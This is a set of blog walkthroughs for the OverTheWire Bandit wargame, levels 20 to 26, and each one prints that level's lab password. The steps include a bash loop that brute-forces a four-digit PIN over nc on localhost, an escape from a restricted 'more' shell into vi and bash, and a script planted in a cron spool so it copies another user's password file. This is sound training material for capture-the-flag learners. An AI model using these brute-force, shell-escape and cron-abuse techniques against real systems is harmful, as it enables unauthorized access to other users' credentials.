Tuesday, October 11, 2022

Bandit26

 

Bandit26






bandit level26

ssh server: bandit.labs.overthewire.org port 2220

username: bandit26

password: c7GvcKlw9mC7aUQaPx7nwFstuAIBw1o1



Remember the last challenge when we used the private key for bandit26 we get disconnected, this is what is going to happen this time also.


So again we will reduce the screen size and go into the edit mode of the more command, but this time we not just need to read or edit a file but we need to execute commands, this means we need to use a normal shell type



We can call the bash shell using the  set shell command



Now we can execute any command we want so we will go execute the ls command as advised in the challenge description




We know the usage of bandit27-do



 this is the password for the next level bandit27

tell we meet there


Your comments and feedback are highly appreciated

Thank You


Bandit25

 

Bandit25




bandit level25

ssh server: bandit.labs.overthewire.org port 2220

username: bandit25

password: p7TaowMYrmu23Ol8hiZh9UvD0O9hpx8d


We have no information about this challenge so lets start with finding out what in our home directory.


We have here file named bandit26.sshkey this should be the private key for bandit26 so all we need to do is to connect with this key
$ ssh -i bandit26.sshkey bandit26@localhost -p 2220


The problem here that just after we get connected we disconnect after it shows us the bandit26 banner. In the challenge description there is a hint that the bandit26 shell is not the normal shell, so lets at the first chick the shell type for bandit26 and compare it with bandit25 shell type 



The shell type for bandit26 is a costume shell located in /usr/bin, so we need to read it to understand the behavior



This shell all what it does is showing the contains of a file named text.txt from the root of bandit26 using the more command, then exit the shell.

As we know the more command shows contains that fits the display size then wait for input from the user to show more lines, so we can reduce the screen size and then try again to connect



Instead of asking the shell to show more lines we will ask it to open the editor using the more command "v" argument



Then ask it to edit the bandit26 password fie which stored in the /etc directory





this is the password for the next level bandit26

tell we meet there


Your comments and feedback are highly appreciated

Thank You


Bandit24

 

Bandit24


 




bandit level24

ssh server: bandit.labs.overthewire.org port 2220

username: bandit24

password: VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar




In This challenge there is a listener on port 30002 waiting to receive the bandit24 password followed by a four digits bin code if the values are correct it will replay with the bandit25 password, lets try to connect and submit the values



As you see the system refuses to send the password unless it received the correct combination, bandit24 password and the correct value of the bin code, the problem that we need to find out the secret bin code which means we need to find out the correct value between 10000 iteration.

So we are going to create a script that try the 10000 iteration itself, then open the connection with the listener and try to submit the bandit24 password with the 10000 bin codes line by line until it receives the correct bin code


bandit24pass=VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar

for i in {0..9999}

do

        echo "$bandit24pass $i" >> list

done

nc localhost 30002 <list > results

cat results | grep -v Wrong


This scrip stores the bandit24 password in a variable names bandit24pass, then start a loop that iterates the values starting from "0000" ending with "9999", at every iteration it will create line in a file named "list" the line will be bandit24 password followed by a the value of the loop iteration, at the end we have a file with 10000 line each line has the bandit24 password followed by the four digits bin number, we will connect to the listener on port 30002 using the file "list" and store the response of the listener in a file named "results", finally reading the "results" file searching for any file that doesn't contains the word "Wrong", this will show us the bandit25 password.


don't forget to change the script file permeations to make it executable before running it 



this is the password for the next level bandit25

tell we meet there


Your comments and feedback are highly appreciated

Thank You


Wednesday, September 28, 2022

Bandit23

Bandit23


 


bandit level23

ssh server: bandit.labs.overthewire.org port 2220

username: bandit23

password: QYw0Y2aiA672PsMmh9puTQuhoz8SyR2G




Its just like the last challenge we need to find the configuration of the cron job to trace it





This time the scrip 1st read the username in the variable myname of the user running it then enter into /var/spool/$myname/foo

Then scan all the files in the foo directory if the file is owned by bandit23 will run it, but if it wasn't owned by bandit23 will not run it but both ways will delete it.

So all what we need is to put a script in the foo directory, but its better to keep a backup of it, maybe we need to do changes to it. 



Create directory in /tmp into it create the script, which will read the bandit24 password and copy it to out temp directory.



We need to change the directory and the script permeations, to allow bandit24 to read and run the script, and write into the temp directory, also copy the script into the /var/spool/bandit24/fool directory



It's a cron job so all what we need is just wait and the job will run which will call the script into the foo directory and return back with the password




 this is the password for the next level bandit24

tell we meet there


Your comments and feedback are highly appreciated

Thank You


Monday, September 26, 2022

Bandit22

 

Bandit22







bandit level22

ssh server: bandit.labs.overthewire.org port 2220

username: bandit22

password: WdDozAdTM2z9DiFEQ2mGlwngMfj4EZff



Its just like the last challenge we need to find the configuration of the cron job to trace it




Our target cron job is coronjob_bandit23, reading it revels the place of the script that runes


So we go to read the scrip from /usr/bin/cronjob_bandit23.sh



The script at the beginning creates a variable named "myname" and give it the value of the output of the whoami command, then creates another variable name it "mytarget" this variable value is coming from 1st echo "I am user (the value of myname variable)" then calculate the MD5 hash of this text finally cuts only the hash value from the output and submit the password of bandit23 into a file named with the MD5 value at the /tmp. This only happens if the user who running the script is bandit23 not any other user else the hash value would be different than expected and also it will only read the password of the user running the scrip not bandit23

But it is a cron job so its running based on time schedule using bandit23 username all what we need is to know the filename, this easily could be found by emulating the scrip function



This is the file name we only need to read this file



 this is the password for the next level bandit23

tell we meet there


Your comments and feedback are highly appreciated

Thank You


Bandit21

 

Bandit21





bandit level21

ssh server: bandit.labs.overthewire.org port 2220

username: bandit21

password: NvEJF7oVjkddltPSrdKEFOllh9V1IBcq



A new type of challenges this time we are going to execute a cronjob script, 1st of all find the script related to our challenge



1st we read the job configuration under the /etc/cron.d



This configuration shows that it executes a script saved in /usr/bin/cronjob_bandit22.sh



The script reads the bandit22 password from /etc/bandit_pass/bandit22 and send it to a temp directory, so all what we need to read this temp directory



 this is the password for the next level bandit22

tell we meet there


Your comments and feedback are highly appreciated

Thank You


Bandit20

 

Bandit20





bandit level20

ssh server: bandit.labs.overthewire.org port 2220

username: bandit20

password: NvEJF7oVjkddltPSrdKEFOllh9V1IBcq



Just like the last challenge we have a program into the home directory of our user when executing it, it tells us how to get the next level password



Here we need to select a port to connect the suconnect program to it, and on the other side we need to open another terminal and inetiat a listener on the same port this using nc command listener will send the password of bandit20 so that the sucnnect would verify it and reply with the pandit21 password





The listener is sending the password and waiting for the reply, on the other terminal the suconnect is checking that the password sent is matching what stored into it, so it sends the pandit21 in the nc terminal




 this is the password for the next level bandit21

tell we meet there


Your comments and feedback are highly appreciated

Thank You


Bandit26

  Bandit26 bandit level26 ssh server: bandit.labs.overthewire.org port 2220 username:  bandit26 password:  c7GvcKlw9mC7aUQaPx7nwFstuAIBw1o1 ...